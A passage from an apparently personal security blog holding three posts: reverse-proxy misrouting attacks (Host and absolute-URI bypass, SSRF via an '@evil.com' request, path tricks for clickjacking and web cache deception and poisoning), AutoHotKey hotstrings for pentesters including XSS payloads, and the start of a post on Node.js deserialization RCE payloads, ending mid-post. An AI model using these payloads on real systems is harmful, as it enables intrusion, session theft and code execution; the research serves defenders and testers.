the idea here is to show an example of possible misusing of reverse
proxy’s features.<br />
<div style="text-align: left;">
<br /></div>
<b>Example 3.</b><br />
As I mentioned before, it’s a common case when a reverse proxy routes
requests to different backends depending on the Host header in a
request.<br />
<br />
Let’s have a look at Haproxy configuration which says that all requests with <code>example1.com</code> in the Host header must be proxied to a backend <code>example1_backend</code> – <code>192.168.78.1:9999</code>.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs java">frontend http-<span class="hljs-function">in
acl host_example1 <span class="hljs-title">hdr</span><span class="hljs-params">(host)</span> -i example1.com
use_backend example1_backend <span class="hljs-keyword">if</span> host_example1
backend example1_backend
server server1 192.168.78.1:9999 maxconn 32</span></code></pre>
</blockquote>
Does such a configuration mean that an attacker cannot access other
virtual hosts of a backend server? It may look like that, but an
attacker can easily do it. Because, as mentioned above, Haproxy doesn’t
support Absolute URI, but most web-servers do. When Haproxy receives
Absolute URI, it forwards this unprocessed Absolute URI to a backend.
Therefore, just by sending next request, we can easily access other
virtual hosts of the backend server.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">http://unsafe-value/path/</span> HTTP/1.1</span>
<span class="hljs-attribute">Host</span>: <span class="hljs-string">example1.com</span></code></pre>
</blockquote>
Is it possible to force a reverse proxy to connect to an arbitrary
backend server? I’d say that in most cases (Nginx, Haproxy, Varnish),
this cannot be done, but Apache (in some configurations/versions) is
vulnerable to it. As Apache “parses” a host value from ProxyPass, we can
send something like <code>GET @evil.com HTTP/1.1</code>, so Apache sees a value <span style="font-size: x-small;"><span style="font-family: "courier new" , "courier" , monospace;">http://backend_server@evil.com</span></span> and sends the request to `evil.com` (SSRF). <a href="https://www.contextis.com/blog/server-technologies-reverse-proxy-bypass" rel="noopener" target="_blank">Here</a> you can see an example of such vulnerability.<br />
<br />
<h2>
Client-Side attacks</h2>
If we have a look at reverse proxy features again, we can see that
all response-related have a potential for client-side attacks. It
doesn’t make them useless. I’d say otherwise. But client-side attacks
have additional limitations to possible inconsistencies between the
reverse proxy and the web server, as the browser process a request
before sending it.<br />
<br />
<h3>
Browser processing</h3>
In a client-side attack, an attacker needs to force a victim’s
browser to send a special request, which will influence a response, to a
server. But the browser follows the specifications and processes the
path before sending it: ^The browser parses the URL (e.g. throws off a
fragment part), URL-encodes all the necessary symbols (with some
exceptions) and normalizes a path. Therefore, to perform such attacks,
we can only use a “valid” request which must fit into the inconsistency
between three components (browser, reverse proxy, backend server).<br />
<br />
Of course, there are differences in browser implementations, plus
some features which still allows us to find such inconsistencies:<br />
<ul>
<li>For example, Chrome and IE don’t decode <span style="font-size: x-small;"><span style="font-family: "courier new" , "courier" , monospace;">%2f</span></span>, so a path like that <code>/path/anything/..%2f../</code> will not be path normalized.</li>
<li>Older versions of Firefox didn’t URL-decode special symbols before normalization, but now it behaves in a similar way to Chrome.</li>
<li>There is information that Safari doesn’t URL-decode a path, so we can force it to sent such a path <code>/path/%2e%2e/another_path/</code>.</li>
<li>Also, IE, as usual, has some magic: it doesn’t process a path when it’s redirected with Location header. </li>
<li><br /></li>
</ul>
<h3>
Misusing Header modification</h3>
A common task for reverse proxy is to add, delete or modify headers
from a response of a backend. In some situations, it’s much easier than
modification of the backend itself. Sometimes it involves modification
of security-important headers. So as attackers, we may want to force a
reverse proxy to apply such rules to wrong responses (from wrong backend
locations) and then use it for attacks on other users.<br />
<br />
Let’s imagine that we have Nginx and Tomcat as a backend. Tomcat, by default, sets header <code>X-Frame-Options: deny</code>, so a browser cannot open it in an iframe. For some reason, a part of the web application (<code>/iframe_safe/</code>) on the Tomcat must be accessible through iframe, so Nginx is configured to delete the her <code>X-Frame-Options</code> for this part. However, there is no potential for clickjacking attacks on <code>iframe_safe</code>. Here is the configuration:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs nginx"><span class="hljs-title">location</span> /iframe_safe/ {
<span class="hljs-title"> proxy_pass</span> <span class="hljs-url">http://tomcat_server/iframe_safe/</span>;
<span class="hljs-title"> proxy_hide_header</span> <span class="hljs-string">"X-Frame-Options"</span>;
}
<span class="hljs-title">location</span> / {
<span class="hljs-title"> proxy_pass</span> <span class="hljs-url">http://tomcat_server/</span>;
}</code></pre>
</blockquote>
However, as attackers, we can make a request which falls under the <code>iframe_safe</code> rule, but it will be interpreted by Tomcat as a completely different location. Here it is:<br />
<pre><code class=" hljs xml"><span class="hljs-tag"><<span class="hljs-title">iframe</span> <span class="hljs-attribute">src</span>=<span class="hljs-value">"http://nginx_with_tomcat/iframe_safe/..;/any_other_path"</span>></span></code></pre>
A browser doesn’t normalize such a path. For Nginx it falls under the <code>iframe_safe</code> rule. Since Tomcat supports path parameters, after path normalization, it will get <code><code>/any_other_path</code></code>.
Therefore, in such a configuration, any path of Tomcat can be iframed,
so an attacker can perform clickjacking attacks on users.<br />
<br />
Of course, with a similar approach, other security-related headers (e.g. CORS, CSP, etc) might be misused too.<br />
<br />
<h3>
Caching</h3>
Caching is one of the most interesting, with a good potential for
various attacks, but is still a little-known feature of reverse proxies.
Recently, cache-related attacks have gotten more attention in some
awesome researches including <a href="http://omergil.blogspot.ru/2017/02/web-cache-deception-attack.html" rel="noopener" target="_blank">Web Cache Deception</a> and <a href="https://i.blackhat.com/us-18/Thu-August-9/us-18-Kettle-Practical-Web-Cache-Poisoning-Redefining-Unexploitable.pdf" rel="noopener" target="_blank">Practical Web Cache Poisoning.</a> In
my research, I’ve been focusing on caching too: I wanted to analyze
various implementations of cache. As a result, I’ve got several ideas on
how to improve both cache deception and cache poisoning attacks.<br />
<br />
<b>How it works</b><br />
There are several factors on cache of a reverse proxy which help us with understanding attacks.<br />
The idea of caching is quite simple. In some situations, a reverse
proxy stores a response from a backend in the cache and then returns the
same response from the cache without accessing the backend. Some
reverse proxies support caching by default, some require configuration.
Generally, a reverse proxy uses as a key of cache, a concatenation of
Host header value with unprocessed path/query from a request.<br />
<br />
To decide if it is Ok to cache a response or not, most reverse
proxies check Cache-Control and Set-Cookie headers from a response of a
backend. Reverse proxies don’t store responses with Set-Cookie at all,
but Cache-Control, as it describes a caching policy and requires
additional parsing. Format of Cache-control header is quite complex, but
basically, it has several flags which allows caching or not, and sets
for how long a response can be cached.<br />
<br />
Cache-Control header may look like these:<code class=" hljs sql"><span class="hljs-operator"><span class="hljs-keyword"> </span></span></code><br />
<blockquote class="tr_bq">
<code class=" hljs sql"><span class="hljs-operator"><span class="hljs-keyword">Cache</span>-Control: <span class="hljs-keyword">no</span>-<span class="hljs-keyword">cache</span>, <span class="hljs-keyword">no</span>-store, must-revalidate<span class="hljs-keyword"></span></span></code> </blockquote>
<blockquote class="tr_bq">
<pre><code class=" hljs sql"><span class="hljs-operator"><span class="hljs-keyword">Cache</span>-Control: <span class="hljs-keyword">public</span>, <span class="hljs-keyword">max</span>-age=<span class="hljs-number">31536000</span></span></code></pre>
</blockquote>
The first example forbids caching by a reverse proxy, the second –
allows it. The absence of a Cache-Control header usually means that a
reverse proxy is allowed to store a response.<br />
<br />
Many web servers, application servers and frameworks set
Cache-Control headers automatically and correctly. In most cases, if a
web app uses session in an script, it will set Cache-Control headers
which restricts caching, so usually programmers don’t need to think
about it. However, in some situations, for example, if a web application
uses its own session mechanism, Cache-Control header can be set
incorrectly.<br />
<br />
<b>Attacks</b><br />
A commonly used feature of a reverse proxy cache is “aggressive caching”
(it’s not really an official term, but describes the idea). In some
cases (for example, a backend can be too strict about caching and
doesn’t allow to cache anything) an administrator, instead of changing
the backend, changes rules of a reverse proxy, so it starts caching
responses even with Cache-Control header which restricts caching.
Usually such rules have some limitations. For example, to cache only
responses of certain extensions (<span style="font-family: "courier new" , "courier" , monospace;"><span style="font-size: x-small;">.jpg, .css, .js</span></span>), or from specific
paths (<code>/images/</code>).<br />
<br />
If a reverse proxy has a path-based rule which allows aggressive
caching, an attacker can create such a path which falls into the rule
but will be interpreted as a completely different path by a backend
server.<br />
<br />
As an example let’s take Nginx+Tomcat again. Next rule intends to force Nginx to cache all the responses from the <code>/images</code> directory of Tomcat.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs nginx"><span class="hljs-title">location</span> /images {
<span class="hljs-title"> proxy_cache</span> my_cache;
<span class="hljs-title"> proxy_pass</span> <span class="hljs-url">http://tomcat_server</span>;
<span class="hljs-title"> proxy_cache_valid</span> <span class="hljs-number">200</span> <span class="hljs-number">302</span> <span class="hljs-number">60m</span>;
<span class="hljs-title"> proxy_ignore_headers</span> Cache-Control Expires;
}</code></pre>
</blockquote>
As attackers, we can misuse this rule to perform a web cache
deception attack. All we need to do is to force a victim user to open
the next URL (using img, for example):<br />
<blockquote class="tr_bq">
<pre><code class=" hljs xml"><span class="hljs-tag"><<span class="hljs-title">img</span> <span class="hljs-attribute">src</span>=<span class="hljs-value">"http://nginx_with_tomcat.com/images/..;/index.jsp"</span>></span></code></pre>
</blockquote>
A victim’s browser then sends a request (with authentication cookies). Nginx sees <code>/images</code>,
so forwards the request to Tomcat and then caches a response (it
doesn’t care about Cache-Control headers). Again, for Tomcat, a path
after normalization is completely different – <code>/index.jsp</code>.
In this way an attacker can force Nginx to cache any page of Tomcat. To
read this cached response, the attacker just needs to access the same
path (<code>/images/..;/index.jsp</code>) and Nginx returns the victim’s sensitive data (e.g. csrf token).<br />
<br />
In some way, it’s just a variation web cache deception, but not only.<br />
<br />
Let’s think about a cache poisoning attack. The attack relies on
finding unkeyed values from a request which can significantly (from a
security point of view) influence a response, but at the same time, this
response must be cached by a reverse proxy, so Cache-Control header
must be permissive. If we mix everything together, we will be able to
find more ways to exploit cache poisoning attacks.<br />
<br />
Let’s imagine the situation. There is Nuster (it’s a cache proxy
based on Haproxy) and a web application. The web application has a
self-XSS vulnerability (which works only in an attacker’s account) in <code>/account/attacker/</code>. Nuster is configured to cache all the responses from <code>/img/</code> directory on the web application:<br />
<blockquote>
<pre><code class=" hljs sql">nuster <span class="hljs-operator"><span class="hljs-keyword">cache</span> <span class="hljs-keyword">on</span>
nuster rule img ttl <span class="hljs-number">1</span>d <span class="hljs-keyword">if</span> { path_beg /img/ }</span></code></pre>
</blockquote>
The attacker just needs to create a special URL (<code>/img/..%2faccount/attacker/</code>),
so Nuster applies an “aggressive caching” rule, still, the web app
returns a response of self XSS (it sees <span style="font-size: x-small;"><span style="font-family: "courier new" , "courier" , monospace;">/account/attacker/</span></span>). The
response with an XSS payload will be cached by Nuster (with the key:
Host + <code>/img/..%2faccount/attacker/</code>), so the attacker will
be able to misuse this cache to XSS attack other users of the web
application.From the self-XSS, we’ve got a usual XSS.<br />
<br />
<h2>
Conclusion</h2>
I have showed several examples of vulnerable configurations for each
attack type. But exact cases are not so important. I wanted to give a
fresh look on reverse proxy related attacks. If we know how a reverse
proxy works, how it processes a request and what is the difference
compared to a backend server, we (as attackers) will be able to reach
more endpoints or perform more sophisticated attacks on users.<br />
<br />
Regarding protections against such attacks, I see no “silver bullet”
here (until we have a really good standard/specification on how to
handle a request/path), but I think this project could help defenders as
well. If you know your proxy and its limitations, you will be able to
change its configuration accordingly.<br />
<br />
Due to my desire to share my thoughts and explain stuff, the article
has become very big. Still, I had to skip a bunch of tricks, you could
see them in the presentation <a href="https://www.slideshare.net/GreenD0g/reverse-proxies-inconsistency" rel="noopener" target="_blank">here</a>. And the most important point of this research – <a href="https://github.com/GrrrDog/weird_proxies" rel="noopener" target="_blank">“raw” results</a>. The research is not finished yet. I will fulfill it step by step with other software. Push requests are really appreciated.<br />
<br />
While preparing this research, I found several other kinds of similar ones, including – <a href="https://github.com/irsdl/httpninja" rel="noopener" target="_blank">https://github.com/irsdl/httpninja</a>. Through a combination of our projects, it’s possible to almost get a matrix of possible inconsistencies.<br />
<b></b><br /></div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-45838761792771015682018-10-01T14:43:00.001-07:002022-08-23T02:49:43.682-07:00Better Web-Pentesting in Windows with AHK<div dir="ltr" style="text-align: left;" trbidi="on">
<i>(It's a repost from <a href="https://www.acunetix.com/blog/web-security-zone/better-web-pentesting-in-windows-with-ahk/">https://www.acunetix.com/blog/web-security-zone/better-web-pentesting-in-windows-with-ahk/</a>)</i><br />
<br />
Recently, I have moved to Malta. It’s quite hot here, but as I’m from
colder country, I like it very much. Actually, I’m obsessed with
everything hot, including hotkeys!<br />
<br />
<i>Every pentester / researcher / bugbounter / etc has their own
approach to doing things in their own work environment. So in this
article I’m not looking to give exact solutions, but the aim is to share
some ideas (which I found useful), so you can have a fresh look at your
approach and push your imagination in this area.</i><br />
<br />
Windows is not a very popular OS for pentesters due to many reasons.
Sometimes however we need to use it (at least on a virtual machine). I
have been a pentester for 8 years and pentested many “windows-only”
applications, I remember that pain, I even got used to it… But,
nowadays, everything is not so bad and hacky.<br />
<br />
Today I want to discuss <a href="https://autohotkey.com/" rel="noopener" target="_blank">AutoHotKey</a>.
This is an old tool and, I’m sure, many of you use it for some kind of
automations. I suggest to look at it as a tool for pentesters.<br />
<br />
<h2>
Basics</h2>
AHK – a small tool which can set global hotkeys and perform a lot of
actions in OS. Actually, it has its own scripting language, and, if you
have enough knowledge (and patience), you can do whatever you want.<br />
I will not explain the syntax of the scripts (there is better doc about it <a href="https://autohotkey.com/docs/Hotkeys.htm#Intro" rel="noopener" target="_blank">here</a>), but I’ll give you a bunch of examples.<br />
<br />
So, the basic idea of AHK is quite simple: In scripts you set global
hotkeys and once you press one of them, AHK will make the necessary
action. All you need to do is install AHK, create your scripts and run
them.<br />
<br />
We all use many programs at once, but we need to use <b>ALT+TAB</b> to switch between them, it could be worse if you use multiple-desktop.<br />
Using next script you can focus on a necessary program (or run it, if
it’s closed), even if you are on another desktop, just by pressing <b>Shift+Ctrl+F4</b> (+ – Shift, ^ – Ctrl)<br />
<pre><code>+^F4::
SetTitleMatchMode 2
IfWinExist Sublime Text
WinActivate, Sublime Text
else
run "C:\Program Files\Sublime Text 3\sublime_text.exe"
return
+^F5::
IfWinExist Google Chrome
WinActivate, Google Chrome
else
run "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
return</code></pre>
<h2>
Rebinding</h2>
For researching/pentesting something related to web, you need to have
all popular browsers at your hands. But it’s such a pain that they have
different or lack of hotkeys.<br />
<br />
For example, by clicking a hotkey (<b>Ctrl+Tab</b>) I can
cycle through the last used tabs (not just next or previous tabs). It
works out of the box for Firefox, but for Chrome you need an extension
(CLUT: Cycle Last Used Tabs, for example). However even with the
extension, you cannot bind Ctrl+Tab for this operation, because you
cannot rebind Chrome’s hotkeys.<br />
<br />
With AHK , you can easily achieve this. Firstly, AHK gives us an
opportunity to set global hotkeys for specific applications. Secondly,
we can “rebind” hotkeys. Here, only for Chrome, when we press Ctrl+Tab,
AHK intercepts it and sends <b>Alt+W</b> into Chrome (! – Alt), so our extension shows us a last used tab.<br />
<pre><code>#IfWinActive ahk_exe chrome.exe
^Tab::
Send, !w
return
#IfWinActive</code></pre>
<h2>
Hotstrings</h2>
Also, AHK supports hotstrings. What is it? When we input a specific
consequence of symbols anywhere in Windows, AHK replaces it with
whatever you want.<br />
<br />
Typical example: Wherever I input two symbols “<b>a</b>” and “<b>@</b>“, they will be replaced with my email.<br />
<pre><code> </code><code>:*:a@::agrrrdog@gmail.com</code>
</pre>
Here are some cases which I found useful.<br />
<br />
When I pentested Windows-only applications with fat clients, it was
annoying to input credentials again and again, especially, if it has
“several layers of protection” or if you need to test multiple roles.<br />
Here is a solution. Create a script which you use only during a project
(with AHK you can run or stop as many ahk-scripts as you want at any
time) with necessary credentials.<br />
<br />
<code>:*:!t1::testAccount
:*:!p1::VeryLoooooongP4ssword
:*:!t2::adminTestAccount
:*:!p2::p4ssw0rd</code><br />
<br />
<br /> <img alt="AHK" class="alignnone wp-image-18215 size-full" height="145" src="https://cdn.acunetix.com/wp_content/uploads/2018/09/image1.gif" width="445" /> <br />
<br />
Now, you can input them fast without using a text-document and clipboard 🙂<br />
We still do a lot of web hacking manually, therefore, we can set
hotstrings for most useful things, which we enter again and again.<br />
<br />
Here are some self-explaining examples (here I use <b>%</b> just to make string more unique):<br />
<pre><code>::%lh::localhost
::%lhh::http://localhost
:*:%hs::https://
::%d.c::document.cookie
::%d.d::document.domain
::%js::javascript:
:*:%c.l::console.log('');{Left 3}
::%alrt::https://yourserver.com/xss_payload.js
::%man::¯\_(ツ)_/¯</code></pre><img alt="AHK" class="alignnone wp-image-18216 size-full" height="145" src="https://cdn.acunetix.com/wp_content/uploads/2018/09/image3.gif" width="445" /><br />
<br />
But we can improve it. For example, we can set our favourite payloads
and also add random parts to them, so it will be easier to track
input/output down in proxy. Wherever we print <b>%xss1</b>, it will be replaced with <b>“<svg/onload=alert(17384)></b> you see, lol?<br />
<pre><code>:?*:%xss1::
Random, rand, 1, 99999
SendInput "<svg/onload=alert(%rand%)>
return</code></pre>
Or with our DNS/HTTP connection-checker:<br />
<pre><code>::%xgl::
Random, rand, 1, 99999
SendInput http://x%rand%.yourserver.here/poc
return</code></pre><img alt="web pentesting" class="alignnone wp-image-18217 size-full" height="51" src="https://cdn.acunetix.com/wp_content/uploads/2018/09/image2.gif" width="445" />
<h2>
Encode-everywhere</h2>
When pentesting or researching something, we often work with strings
and their encoding, modifications. We have some tools which help us
(like HackBar addon for browsers) or use online resources. What if we
can make it (semi-)global? For example, we select a string in any
application, press a hotkey and get its base64-(de/en)coded version? Or
md5-hash of it? Or any other mutation?<br />
<br />
To be honest, the AHK’s scripting language doesn’t look friendly to
me, so the idea is to use “normal” language, such as python. I found
several projects which try to join AHK and Python, but it looks like all
of them are forgotten.<br />
<br />
So, we use “a universal” way of calling a program from AHK and getting results from it:<br />
<pre><code>!F10::
SendInput {Ctrl down}c{Ctrl up}
RunWait %ComSpec% /c ""python" "converter.py" "urldec" "%Clipboard%" > "%A_Temp%\tmp1.txt"",,HIDE
FileRead result, %A_Temp%\tmp1.txt
sleep, 100
Clipboard := result
SendInput {Ctrl down}v{Ctrl up}
return</code></pre>
Yep, it looks awful: We run new cmd (not just python) to be able to
hide the “black window”, we get selected text using clipboard and get
results from a file(1). However, it works pretty well and fast. So we
select and copy text, press <b>ALT+F10</b> and the script base64-decodes the text and replaces the selected one.<br />
<br />
But if you set a lot of global-hotkeys, it could be hard to remember
them and to use fast. So we can create a menu with internal hotkeys. As
our selection may contain special symbols or to be multiline, it’s
better to pass it using an additional file. Also, we can put all similar
things into one function.<br />
<pre><code>RunProgram(command)
{
SendInput {Ctrl down}c{Ctrl up}
;sleep, 200 ; it added some stability for one of my laptops
FileAppend, %Clipboard%, %A_Temp%\tmp_in.txt
RunWait %ComSpec% /c ""python" "C:\path_to_script\kostyli.py" "%command%" ",,HIDE
FileRead, Clipboard, %A_Temp%\tmp_out.txt
;sleep, 100 ; it added some stability for one of my laptops
SendInput {Ctrl down}v{Ctrl up}
FileDelete, %A_Temp%\tmp_in.txt
FileDelete, %A_Temp%\tmp_out.txt
}
Menu, EncoderMenu, Add, &Base64 Encode, B64EncHandler
Menu, EncoderMenu, Add, B&ase64 Decode, B64DecHandler
Menu, EncoderMenu, Add, &URL Encode, UrlEncHandler
Menu, EncoderMenu, Add, U&rl Decode, UrlDecHandler
return
B64EncHandler:
RunProgram("b64enc")
return
#c::Menu, EncoderMenu, Show</code></pre>
Here we define a menu and set various handlers for it. The approach is the same: select text, press `<b>Win+C</b>` and press a button of appropriate encoder/decoder (marked by &).<br />
<br /><img alt="web pentest" class="alignnone size-full wp-image-18218" height="359" src="https://cdn.acunetix.com/wp_content/uploads/2018/09/image4.gif" width="649" />
<h2>
Some tips</h2>
<ul>
<li>Be careful with global hotkeys (which you set not only for one/group
application), because you can “override” some useful hotkeys of app.</li>
<li>Hotstrings don’t work so well in smart text-editors (like Sublime or
VS Code), because AHK just send keys instead of you, so autocompletion
and similar features of a text editor come into play.</li>
<li>Be careful when you use SendInput if you have several keyboard layouts in OS.</li>
<li>AHK is quite a reliable tool, but sometimes it doesn’t work so fast and it’s hard to debug. So, keep things simple.</li>
<li>You can set a hotkey to reload the script which is very useful during development (!^+R::Reload).</li>
<li>AHK allows you to find the elements of a window and makes actions
with them (click, input text). So you can set hotkeys even if an
application doesn’t have them. Java Swing application is not supported
by default, but by using Java Access Bridge and this library
(https://github.com/Elgin1/Java-Access-Bridge-for-AHK) we can archive
it. </li>
</ul>
<br />
<h2>
Conclusion</h2>
In the beginning of the article I wrote about “hacky-way”… ok. AHK is a totally hacky solution, but it works!<br />
<br />
What about other similar tools? Similar tools of course exist and
exist in other OS. They have some additional features or limits. For
example, python package <a href="https://github.com/boppreh/keyboard" rel="noopener" target="_blank">keyboard</a> or <a href="https://github.com/asweigart/pyautogui" rel="noopener" target="_blank">pyautogui</a> which work for Linux and Windows.<br />
<br />
You may have a look at some final examples of AHK at <a href="https://github.com/GrrrDog/Pentest-Env" rel="noopener" target="_blank">my repository</a>.</div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-63605631282143977822018-07-19T14:39:00.000-07:002019-06-11T14:32:01.034-07:00Deserialization Vulnerabilities: Attacking Deserialization in JS<div dir="ltr" style="text-align: left;" trbidi="on">
<i>(It's a repost from <a href="https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/">https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/</a>)</i><br />
<br />
At ZeroNights 2017 conference, I spoke about “Deserialization
vulnerabilities in various languages”. For my presentation, I used an
interesting <a href="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/">article</a>
about two serialization packages of Node.js. I showed them as examples
of vulnerable implementations of deserialization processes. In this
post, I’d like to show results of my own research and a new approach of
attacking <b>deserialization in JS</b>.<br />
<i> </i><br />
<h3>
Previous research</h3>
<div style="text-align: left;">
The article mentioned above talks about two packages – <code>node-serialize</code> and <code>serialize-to-js</code>. Both of them can serialize an object in JSON format, but unlike standard functions (<code>JSON.parse</code>, <code>JSON.stringify</code>), they allow the serialization of almost any kind of object, such as <b>Function</b>, for example (i.e in JavaScript, a function is an object too). So, it’s a valid object:</div>
<blockquote class="tr_bq">
<pre><code class=" hljs javascript"><span class="hljs-keyword">var</span> obj = {
field1: <span class="hljs-string">"value1"</span>,
field2: <span class="hljs-function"><span class="hljs-keyword">function</span><span class="hljs-params">()</span></span>{
<span class="hljs-keyword"> return</span> <span class="hljs-number">1</span>;
}
}</code></pre>
</blockquote>
But if we serialize it using <code>JSON.stringify</code>, we have only:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs bash">{ field1: <span class="hljs-string">"value1"</span> }</code></pre>
</blockquote>
To implement support of all kinds of objects, <code>node-serialize</code>, internally uses <code>eval</code>.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs bash">{<span class="hljs-string">"anything_here"</span>:<span class="hljs-string">"_$<span class="hljs-variable">$ND_FUNC</span>$<span class="hljs-variable">$_function</span> (){сonsole.log(1)}"</span>}</code></pre>
</blockquote>
This is what a serialized object with a function should look like.
During the deserialization process, anything after a special tag <code>$$ND_FUNC$$</code> goes directly to <code>eval</code> function. Therefore, we can use IIFE (as mentioned in the <a href="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/" rel="noopener" target="_blank">article</a>) or write code directly (as mentioned in the <a href="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/" rel="noopener" target="_blank">article</a>‘s comment).<br />
<br />
With IIFE (Immediately-Invoked Function Expression), all we need to
do is add () to a function and it will be automatically invoked just
after it will be defined during deserialization.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs bash">{<span class="hljs-string">"anything_here"</span>:<span class="hljs-string">"_$<span class="hljs-variable">$ND_FUNC</span>$<span class="hljs-variable">$_function</span> (){сonsole.log(1)}()"</span>}
{<span class="hljs-string">"anything_here"</span>:<span class="hljs-string">"_$<span class="hljs-variable">$ND_FUNC</span>$<span class="hljs-variable">$_console</span>.log(1)"</span>}</code></pre>
</blockquote>
The next example is <code>serialize-to-js</code>. Although it doesn’t
support function as a type, its implementation is still insecure due to
the fact that it uses next construction during the deserialization
process:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs php"><span class="hljs-keyword">return</span> (<span class="hljs-keyword">new</span> <span class="hljs-function"><span class="hljs-keyword">Function</span><span class="hljs-params">(<span class="hljs-string">'"use strict"; return '</span> + str)</span>)<span class="hljs-params">()</span></span></code></pre>
</blockquote>
where <code>str</code> is a value under the attacker’s control.<br />
Practically, it’s just a variation of <code>eval</code>. So we can achieve RCE using the following payload as seen in the following <a href="https://github.com/commenthol/serialize-to-js/issues/3" rel="noopener" target="_blank">issue</a>:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs javascript"><span class="hljs-built_in">console</span>.log(`exploited`)
(<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-params">()</span></span>{сonsole.log(<span class="hljs-number">1</span>)}())</code></pre>
</blockquote>
<br />
<h3>
The safer way?</h3>
After my presentation at ZeroNights, I came across a <a href="https://www.npmjs.com/package/serialize-javascript" rel="noopener" target="_blank">package for serialization from Yahoo</a>.
It supports serialization of functions too. However, the package
doesn’t include any deserialization functionality and requires you to
implement it yourself. Their example uses <code>eval</code> directly. So I was interested to see if there were any packages supporting function serialization and did not use <code>eval</code> or similar functions.<br />
<br />
Actually, there are a lot of serialization libraries (about 40 or 60). I
looked through some of them and found that a safer way of
deserialization is to use different constructors depending on an object
type.<br />
<br />
For example, a package returns new <code>Function(params, body)</code>
for a function, where params and body are taken from specific JSON
fields. In this case, the function is reconstructed, however an attacker
cannot force its execution.<br />
<br />
I’ve also found another vulnerable package <a href="https://www.npmjs.com/package/funcster" rel="noopener" target="_blank">funcster</a>.
It is vulnerable to the same attack using IIFE as previous ones, so we
(as attackers) can execute our code during the deserialization process.
Here is an example of a payload:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs css"><span class="hljs-rules">{ <span class="hljs-rule"><span class="hljs-attribute">__js_function</span>:<span class="hljs-value"> <span class="hljs-string">'function testa(){var pr = this.constructor.constructor("return process")(); pr.stdout.write("param-pam-pam") }()'</span> </span></span></span>}</code></pre>
</blockquote>
The package uses another approach for serialization/deserialization.
During deserialization it creates a new module with exported functions
from a JSON file. Here is part of the code:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs bash"><span class="hljs-keyword">return</span> <span class="hljs-string">"module.exports=(function(module,exports){return{"</span> + entries + <span class="hljs-string">"};})();"</span>;</code></pre>
</blockquote>
The interesting difference here is that the standard built-in objects
are not accessable, because they are out of scope. It means that we can
execute our code, but cannot call build-in objects’ methods. So if we
use <code>console.log()</code> or <code>require(something)</code>, Node returns an exception like <code>"ReferenceError: console is not defined"</code>.<br />
<br />
However, we can easily can get back access to everything because we still have access to the global context:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs javascript"><span class="hljs-keyword">var</span> pr = <span class="hljs-keyword">this</span>.constructor.constructor(<span class="hljs-string">"console.log(1111)"</span>)();</code></pre>
</blockquote>
Here <code>this.constructor.constructor</code> gives us Function object, we set our code as a parameter there and call it using IIFE.<br />
<br />
<h3>
Step deeper with Prototype</h3>
While I was researching packages, I stumbled upon the idea to look at
other approaches of attacks on deserialization, which are used in other
languages. To achieve code execution we leverage functions with
attacker’s controlled data which are called automatically during the
deserialization process or after when an application interacts with a
newly created object. Something similar to “magic methods” in other
languages.<br />
<br />
Actually, there are a lot of packages which work completely
differently, still after some experiments I came to an interesting
semi-universal attack. It is based on two facts.<br />
<br />
Firstly, many packages use the next approach in the deserialization
process. They create an empty object and then set its properties using
square brackets notations:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs ini"><span class="hljs-setting">obj[key]=<span class="hljs-value">value</span></span></code></pre>
</blockquote>
where <b>key</b> and <b>value</b> are taken from JSON<br />
<br />
Therefore we as attackers are able to control practically any property
of a new object. If we look through the list of properties, our
attention comes to the <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto" rel="noopener" target="_blank">cool __proto__ property </a>.
The property is used to access and change a prototype of an object.
This means that we can change the object’s behavior and add/change its
methods.<br />
<br />
Secondly, a call of some function leads to the invoking of the
function arguments’ methods. For example, when an object is converted to
a string, then methods valueOf, toString of the object are called
automatically (more details <a href="http://2ality.com/2012/03/converting-to-string.html" rel="noopener" target="_blank">here</a>). So, <code>console.log(obj)</code> leads to invocation of <code>obj.toString()</code>. Another example, <code>JSON.stringify(obj)</code> internally invokes obj.toJSON().<br />
<br />
Using both of these features, we can get remote code execution in process of interaction between an application <code>(node.js)</code> and an object.<br />
<br />
I’ve found a nice example – <a href="https://www.npmjs.com/package/cryo" rel="noopener" target="_blank">package Cryo</a>,
which supports both function serialization and square bracket notation
for object reconstruction, but which isn’t vulnerable to IIFE, because
it properly manages object (without using <code>eval&co</code>).<br />
<br />
Here a code for serialization and deserialization of an object:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs javascript">var Cryo = <span class="hljs-built_in">require</span>(<span class="hljs-string">'cryo'</span>);
<span class="hljs-keyword">var</span> obj = {
testFunc : <span class="hljs-function"><span class="hljs-keyword">function</span><span class="hljs-params">()</span> </span>{<span class="hljs-keyword">return</span> <span class="hljs-number">1111</span>;}
};
<span class="hljs-keyword">var</span> frozen = Cryo.stringify(obj);
<span class="hljs-built_in">console</span>.log(frozen)
<span class="hljs-keyword">var</span> hydrated = Cryo.parse(frozen);
<span class="hljs-built_in">console</span>.log(hydrated);</code></pre>
</blockquote>
Serialized JSON looks like that. Pretty tangled:<br />
<blockquote class="tr_bq">
